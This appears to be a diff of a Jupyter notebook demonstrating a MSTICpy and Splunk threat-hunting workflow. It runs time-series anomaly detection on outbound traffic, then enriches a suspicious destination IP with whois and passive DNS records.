CsUDR3QgAAGBtUNHdCAAAYG1Q0d0IAABgbVDR3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[272]},\"TotalBytesSent\":[10823,14821,13532,11947,11193,13257,13375,27975,31501,28775,31398,32979,32241,33539,28420,25757,30947,27803,29637,29670,11563,13465,13587,14967,12964,13858,13119,13907,12739,11227,11268,31322,26683,32982,32544,31414,28254,29893,31290,28334,26328,26448,30576,30793,10484,14995,11715,11296,10487,10789,14758,10998,10682,14572,13689,34167,27286,33955,33700,26810,30679,31533,33739,32815,26046,27499,33974,29118,12821,12836,13819,14877,14220,10053,14690,13161,14334,12806,11771,25544,27355,33777,27055,27816,32648,25686,32147,33363,28923,31547,33575,26369,14754,10415,10286,12086,11414,14915,14479,14063,13211,12485,14759,26964,31469,26214,33556,32596,25150,31064,25338,25714,26089,25673,48616,45856,48616,48616,11654,13127,45856,45856,12184,12184,12184,14179,14179,14179,13841,13841,13841,11097,11097,11097,13724,13724,13724,10535,10535,10535,10022,10022,10022,12570,12570,12570,14145,14145,14145,18473,18473,18473,19477,19477,19477,19080,19080,19080,17622,17622,17622,18725,18725,18725,17612,17612,17612,19733,19733,19733,19338,19338,19338,18656,18656,18656,17732,17732,17732,17801,17801,17801,16167,16167,16167,16485,16485,16485,11455,11455,11455,10545,10545,10545,13991,13991,13991,10699,10699,10699,12735,12735,12735,12639,12639,12639,14501,14501,14501,12477,12477,12477,11497,11497,11497,10081,10081,10081,11729,11729,11729,18121,18121,18121,17458,17458,17458,18104,18104,18104,16508,16508,16508,17814,17814,17814,16494,16494,16494,17588,17588,17588,18545,18545,18545,19534,19534,19534,16085,16085,16085,15276,15276,15276,15363,15363,15363,18166,18166,18166,13830,13830,13830,13350,13350,13350,11842,11842,11842,11111,11111,11111],\"anomalies\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\"baseline\":[9967,12647,13282,12099,11149,12505,12297,30814,29694,31830,32863,32600,32113,33448,31404,28388,29977,28356,29786,29685,7980,11082,13632,14117,11757,13268,14037,12675,11993,12896,12619,30037,28712,31414,31605,30466,30321,30846,30213,28168,27766,27151,30910,29311,11623,13393,12318,13180,13020,13701,13999,12782,12513,13122,13077,29286,28219,31319,31208,29568,29567,29720,30294,29225,27243,27396,33549,30638,17104,17565,12112,13147,15434,15340,14188,12818,12793,13246,13314,27629,26980,29714,29418,27074,27056,26787,27988,27777,24578,25250,33791,29839,21041,20376,10938,12485,20612,20768,13969,13347,13713,14890,15731,25438,27213,28763,29887,29113,29274,29847,31064,31718,30200,30241,37911,34582,30220,28716,17700,19021,27595,27446,17815,16814,15899,16280,15796,19294,19667,17942,18181,16248,14068,14274,13205,13104,12579,12100,18284,17056,15942,15847,6749,8925,17714,18549,11069,11542,11984,13697,14469,16239,17402,17400,18622,18156,17795,18714,18438,18700,18913,18374,20746,20510,18965,18967,15257,16271,19516,19478,17406,17361,17312,18165,18098,18012,18319,18189,18036,17547,17356,17149,16663,16426,16176,15583,15317,15050,12619,12357,12101,12140,11909,11695,13062,12881,12718,13624,13496,13386,13032,12989,12965,12812,12823,12849,12535,12608,12709,13263,13428,13622,11385,11622,11869,12153,12402,12649,13930,14169,14406,15594,15839,16094,15714,15941,16182,16321,16581,16846,16852,17113,17355,18719,18905,19059,16396,16497,16580,16419,16479,16531,16930,16973,17012,18021,18046,18058,17037,16886,16721,16420,16236,16046,15665,15466,15272,17051,16877,16714,13489,13346,13212,12724,12601,12483,11900,11785,11672,12497,12385,12275],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271],\"residual\":[855,2173,249,-152,43,751,1077,-2839,1806,-3055,-1465,378,127,90,-2984,-2631,969,-553,-149,-15,3582,2382,-45,849,1206,589,-918,1231,745,-1669,-1351,1284,-2029,1567,938,947,-2067,-953,1076,165,-1438,-703,-334,1481,-1139,1601,-603,-1884,-2533,-2912,758,-1784,-1831,1449,611,4880,-933,2635,2491,-2758,1111,1812,3444,3589,-1197,102,424,-1520,-4283,-4729,1706,1729,-1214,-5287,501,342,1540,-440,-1543,-2085,374,4062,-2363,741,5591,-1101,4158,5585,4344,6296,-216,-3470,-6287,-9961,-652,-399,-9198,-5853,509,715,-502,-2405,-972,1525,4255,-2549,3668,3482,-4124,1216,-5726,-6004,-4111,-4568,10704,11273,18395,19899,-6046,-5894,18260,18409,-5631,-4630,-3715,-2101,-1617,-5115,-5826,-4101,-4340,-5151,-2971,-3177,518,619,1144,-1565,-7749,-6521,-5920,-5825,3272,3644,-5144,-5979,3075,2602,2160,4775,4003,2233,2074,2076,854,923,1284,365,-816,-1078,-1291,350,-2021,-1785,-1353,-1355,2354,3461,216,254,1931,1976,2025,490,557,643,-587,-457,-304,253,444,651,-496,-259,-9,901,1167,1434,-1164,-902,-646,-1595,-1364,-1150,928,1109,1272,-2925,-2797,-2687,-297,-254,-230,-173,-184,-210,1965,1892,1791,-786,-951,-1145,111,-125,-372,-2072,-2321,-2568,-2201,-2440,-2677,2526,2281,2026,1743,1516,1275,1782,1522,1257,-344,-605,-847,-905,-1091,-1245,97,-3,-86,1168,1108,1056,1614,1571,1532,1512,1487,1475,-952,-801,-636,-1144,-960,-770,-302,-103,90,1114,1288,1451,340,483,617,625,748,866,-58,56,169,-1386,-1274,-1164],\"score\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[272]},\"seasonal\":[-11937,-9261,-8633,-9826,-10788,-9446,-9670,8827,7688,9805,10818,10535,10030,11347,9287,6255,7830,6189,7583,7447,-14291,-11223,-8705,-8247,-10625,-9120,-8344,-9684,-10333,-9384,-9604,7883,6641,9435,9721,8678,8625,9233,8670,6676,6304,5697,9439,7805,-9936,-8234,-9392,-8625,-8894,-8329,-8150,-9486,-9863,-9343,-9458,6695,5585,8658,8534,6890,6895,7061,7656,6620,4686,4898,11119,8282,-5180,-4651,-10051,-8984,-6693,-6812,-8015,-9455,-9555,-9167,-9147,5140,4494,7268,7050,4811,4919,4787,6128,6045,2954,3708,12305,8378,-423,-1116,-10599,-9105,-1038,-950,-7845,-8616,-8479,-7642,-7247,1921,3078,3944,4352,2876,2392,2414,3197,3547,1865,1886,9676,6592,2584,1534,-8942,-7006,2242,2822,-6023,-6171,-6159,-4774,-4188,417,1911,1283,2558,1558,175,1029,454,700,381,-31,6090,4707,3372,3003,-6410,-4581,3839,4299,-3559,-3464,-3400,-2060,-1659,-256,547,206,1121,386,-202,527,96,235,357,-237,2111,1877,349,376,-3300,-2248,1041,1056,-956,-933,-904,42,90,145,624,697,778,547,634,717,530,596,651,362,396,418,-1733,-1731,-1738,-1469,-1489,-1515,20,-11,-46,969,934,902,612,620,637,514,545,581,261,305,350,816,861,905,-1508,-1466,-1426,-1352,-1315,-1279,-206,-172,-138,844,878,915,307,298,298,195,214,244,25,80,141,1358,1431,1509,-1197,-1113,-1025,-1167,-1075,-982,-536,-442,-347,724,821,921,6,-18,-35,-168,-161,-141,-280,-218,-144,1906,2003,2111,-843,-716,-582,-801,-655,-504,-817,-659,-499,600,766,936],\"trend\":[21904,21908,21915,21925,21937,21951,21968,21986,22005,22025,22045,22064,22083,22101,22117,22132,22147,22167,22202,22237,22272,22306,22338,22364,22382,22388,22381,22360,22326,22281,22224,22153,22071,21979,21883,21787,21696,21612,21543,21492,21462,21454,21470,21506,21560,21628,21710,21806,21914,22030,22150,22268,22376,22465,22536,22591,22633,22661,22674,22677,22671,22659,22637,22604,22557,22498,22429,22356,22284,22217,22163,22132,22127,22152,22204,22273,22348,22413,22461,22488,22485,22445,22368,22263,22137,21999,21859,21731,21624,21541,21486,21461,21464,21493,21537,21590,21650,21719,21815,21963,22193,22532,22979,23516,24134,24818,25534,26237,26881,27432,27867,28171,28335,28354,28234,27989,27635,27182,26643,26028,25352,24624,23839,22986,22059,21054,19985,18877,17756,16658,15622,14690,13892,13245,12751,12404,12198,12132,12193,12349,12569,12843,13159,13507,13874,14249,14628,15007,15384,15757,16128,16496,16854,17193,17501,17770,17997,18187,18341,18464,18555,18611,18634,18632,18616,18590,18558,18519,18474,18422,18362,18294,18216,18122,18008,17867,17695,17491,17257,16999,16722,16432,16133,15829,15524,15220,14921,14631,14353,14089,13840,13609,13399,13210,13042,12893,12764,12654,12561,12484,12420,12368,12328,12298,12277,12267,12273,12302,12359,12447,12567,12717,12893,13089,13296,13506,13717,13928,14136,14341,14545,14750,14960,15179,15407,15643,15884,16126,16366,16602,16826,17032,17213,17361,17473,17550,17594,17610,17606,17586,17555,17514,17467,17415,17359,17297,17224,17136,17031,16905,16757,16588,16398,16188,15946,15685,15416,15144,14873,14602,14332,14063,13794,13526,13257,12987,12717,12445,12172,11896,11618,11338],\"weights\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"1049\"},\"selection_policy\":{\"id\":\"1050\"}},\"id\":\"1002\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"TimeGenerated\":\"datetime\",\"Tooltip\":\"printf\"},\"tooltips\":[[\"TimeGenerated\",\"@TimeGenerated{%F %T}\"],[\"TotalBytesSent\",\"@TotalBytesSent\"],[\"residual\",\"@residual\"],[\"trend\",\"@trend\"],[\"seasonal\",\"@seasonal\"],[\"weights\",\"@weights\"],[\"baseline\",\"@baseline\"],[\"score\",\"@score\"]]},\"id\":\"1003\",\"type\":\"HoverTool\"}],\"root_ids\":[\"1146\"]},\"title\":\"Bokeh Application\",\"version\":\"2.1.1\"}};\n",
+       "  var render_items = [{\"docid\":\"a5274443-dbc3-4b3b-bb2d-024b4f91b8b1\",\"root_ids\":[\"1146\"],\"roots\":{\"1146\":\"9cd24875-61f0-40fb-8163-512ce9d45266\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1146"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.models.layouts.Column\">Column</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'1406', <span id=\"1408\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">children&nbsp;=&nbsp;[Figure(id='1004', ...), Figure(id='1116', ...)],</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;None,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">rows&nbsp;=&nbsp;'auto',</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">spacing&nbsp;=&nbsp;0,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;None,</div></div><div class=\"1407\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto')</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"1408\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"1407\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Column(id='1406', ...)"
+      ]
+     },
+     "execution_count": 9,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Conduct our timeseries analyis\n",
+    "output = timeseries_anomalies_stl(stldemo)\n",
+    "# Visualize the timeseries and any anomalies\n",
+    "display_timeseries_anomolies(data=output, y= 'TotalBytesSent')"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>Anomalous session start time: 2020-07-10 18:00:00+00:00 - end time: 2020-07-10 22:00:00+00:00</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Identify when the anomalies occur so that we can use this timnerange to scope the next stage of our investigation.\n",
+    "start = output[output['anomalies']==1]['TimeGenerated'].min()\n",
+    "end = output[output['anomalies']==1]['TimeGenerated'].max() +  pd.to_timedelta(1, unit='h')\n",
+    "\n",
+    "# md and md_warn are MSTICpy features to provide simple, and clean output in notebook cells\n",
+    "md(f\"Anomalous session start time: {start} - end time: {end}\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Enrich and Pivot on IP Addresses\n",
+    "With the time series analysis identifying several events of interest we need additional context to be able to effectively conduct a security investigation. MSTICpy has a range of features to help enrich key data types and provide that context depending on the entities being used. <br>\n",
+    "To get these entities we again query Splunk to get the IP addresses associated with the anomalous traffic."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>Top talkers during anomolous session: </p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/plain": [
+       "SourceIP       DestinationIP\n",
+       "20.185.182.48  31.220.60.108    8328\n",
+       "10.16.12.1     40.124.45.19     1004\n",
+       "10.0.3.5       40.124.45.19      621\n",
+       "10.4.5.12      13.71.172.130     247\n",
+       "               40.77.232.95      189\n",
+       "Name: TotalBytesSent, dtype: int32"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "splunk_query = \"search host=network_raw index=blackhat earliest=0 | table TimeGenerated, Action, SourceIP, DestinationIP, TotalBytesSent\"\n",
+    "net_data = splunk_prov.exec_query(splunk_query)\n",
+    "\n",
+    "# We need to identify what network endpoints are associated with the anomalies\n",
+    "net_data['TotalBytesSent'] = net_data['TotalBytesSent'].astype(int)\n",
+    "grouped_df = net_data.groupby(['SourceIP', 'DestinationIP'])\n",
+    "noisy_hosts = grouped_df['TotalBytesSent'].agg(np.sum).sort_values(ascending=False)\n",
+    "md(\"Top talkers during anomolous session: \", 'bold')\n",
+    "display(noisy_hosts[:5])\n",
+    "source_ip, dest_ip = noisy_hosts.index[0][0:2]"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Network data enrichment\n",
+    "### Network data enrichment\n",
+    "MSTICpy can help analysts investigate an IP address, using open source information such as [passive DNS](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html?highlight=passive%20dns#use-to-do-a-passive-dns-lookup) data, [IP geolocation](https://msticpy.readthedocs.io/en/latest/data_acquisition/GeoIPLookups.html) and [threat intelligence](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html) feeds to provide valuable context.\n",
+    "\n",
+    "> Note: Whois module uses *ipwhois*, TI module uses services from *OTX*, *VirusTotal*, *XForce*, *AzureSentinel*, and *OpenPageRank*"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>Target IP: 31.220.60.108</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>31.220.60.108 is a Public IP address</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>Whois Registrar Info :</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>ASN Owner: AS-HOSTINGER, LT</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>ASN Address: Hostinger International Ltd.\n",
+       "61 Lordou Vyronos\n",
+       "Lumiel Building, 4th floor\n",
+       "6023\n",
+       "Larnaca\n",
+       "CYPRUS</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>Passive DNS records for 31.220.60.108:</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "joblly.com  -  2020-07-09T10:48:00Z\n",
+      "cdn-xhr.com  -  2020-07-09T10:48:00Z\n",
+      "rackxhr.com  -  2020-07-09T10:48:00Z\n",
+      "hixrq.net  -  2020-07-09T10:48:00Z\n",
+      "idpcdn-cloud.com  -  2020-07-09T10:48:00Z\n",
+      "thxrq.com  -  2020-07-09T10:48:00Z\n",
+      "hivnd.net  -  2020-07-09T10:48:00Z\n"
